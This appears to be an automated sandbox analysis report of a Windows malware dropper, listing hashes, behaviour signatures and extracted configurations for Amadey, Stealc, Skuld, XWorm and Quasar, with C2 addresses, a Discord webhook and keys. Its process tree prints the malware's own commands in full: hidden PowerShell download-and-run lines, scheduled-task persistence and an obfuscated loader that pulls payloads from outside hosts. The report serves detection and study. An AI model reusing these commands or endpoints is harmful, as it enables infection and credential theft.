Overview

overview

10

Static

static

5

random.exe3.exe

windows7-x64

10

random.exe3.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22/03/2025, 16:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    random.exe3.exe

  • Size

    938KB

  • MD5

    bcefbd57340b3f8c39699195c2946d69

  • SHA1

    73eb2f2c99d6a7141fc577d9375ae3992ac58b4a

  • SHA256

    8339734ef64625aea2605628510e071dccbb57941c2dd068c8b34fc859c4f2ec

  • SHA512

    a9cdc53ff3b7b5c6913353a70a268e88a61dd1a7b4ad9f2cf5657b28ff5b612cf8c20275e070c54a31acb83ea1608d273c2217e56415e1a8c0626c6b82681b9f

  • SSDEEP

    24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:9TvC/MTQYxsWR7a0J

Score
10/10
amadeyhealerquasarskuldstealcvidarxworm092155telegramtrumpagilenetcredential_accessdefense_evasiondiscoverydropperevasionexecutionpersistenceratspywarestealerthemidatrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg
exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

skuld

C2

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

xworm

Version

5.0

C2

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_LoEArEgGuZRG2bQs0E

Attributes
  • encryption_key

    yMvSAv7B2dURg67QYU5x

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 3 IoCs
    stealer
  • Detect Xworm Payload 5 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 4 IoCs
  • Skuld family
    skuld
  • Skuld stealer

    An info stealer written in Go lang.

    stealerskuld
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
    defense_evasion
  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 16 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 46 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 5 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    defense_evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 60 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 57 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 24 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1196
      • C:\Users\Admin\AppData\Local\Temp\random.exe3.exe
        "C:\Users\Admin\AppData\Local\Temp\random.exe3.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1576
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn ka3k7maPOtF /tr "mshta C:\Users\Admin\AppData\Local\Temp\8teo1bV5V.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn ka3k7maPOtF /tr "mshta C:\Users\Admin\AppData\Local\Temp\8teo1bV5V.hta" /sc minute /mo 25 /ru "Admin" /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2996
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\8teo1bV5V.hta
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2124
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2652
            • C:\Users\Admin\AppData\Local\TempMWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE
              "C:\Users\Admin\AppData\Local\TempMWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2632
              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Downloads MZ/PE file
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Loads dropped DLL
                • Adds Run key to start application
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:288
                • C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe
                  "C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:2384
                  • C:\Windows\system32\cmd.exe
                    cmd.exe /c 1.bat && 2.js
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2396
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic cpu get name
                      9⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2340
                    • C:\Windows\system32\find.exe
                      find "QEMU"
                      9⤵
                        PID:664
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:448
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                          10⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:820
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
                        9⤵
                          PID:1756
                    • C:\Users\Admin\AppData\Local\Temp\10301270101\f08618d6a4.exe
                      "C:\Users\Admin\AppData\Local\Temp\10301270101\f08618d6a4.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of WriteProcessMemory
                      PID:1480
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c schtasks /create /tn gZTOOmaPtZC /tr "mshta C:\Users\Admin\AppData\Local\Temp\tDCwMdHcr.hta" /sc minute /mo 25 /ru "Admin" /f
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of WriteProcessMemory
                        PID:1020
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /tn gZTOOmaPtZC /tr "mshta C:\Users\Admin\AppData\Local\Temp\tDCwMdHcr.hta" /sc minute /mo 25 /ru "Admin" /f
                          9⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:2188
                      • C:\Windows\SysWOW64\mshta.exe
                        mshta C:\Users\Admin\AppData\Local\Temp\tDCwMdHcr.hta
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        PID:1264
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AVGPJYRDYYLGNR77QNVSEZ5G4HW58H16.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                          9⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • Downloads MZ/PE file
                          • System Location Discovery: System Language Discovery
                          PID:2964
                          • C:\Users\Admin\AppData\Local\TempAVGPJYRDYYLGNR77QNVSEZ5G4HW58H16.EXE
                            "C:\Users\Admin\AppData\Local\TempAVGPJYRDYYLGNR77QNVSEZ5G4HW58H16.EXE"
                            10⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2888
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\10301280121\am_no.cmd" "
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:2284
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /t 2
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Delays execution with timeout.exe
                        PID:2916
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2536
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2556
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        PID:2484
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                          9⤵
                          • Command and Scripting Interpreter: PowerShell
